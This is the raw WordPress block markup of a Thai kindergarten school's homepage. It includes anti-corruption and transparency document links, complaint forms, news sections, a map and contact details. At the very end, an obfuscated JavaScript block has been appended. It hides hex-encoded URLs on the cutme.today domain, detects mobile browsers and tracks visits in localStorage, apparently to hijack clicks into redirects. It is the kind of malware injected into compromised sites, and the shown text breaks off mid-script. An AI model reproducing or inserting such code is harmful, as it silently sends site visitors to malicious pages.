{\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const 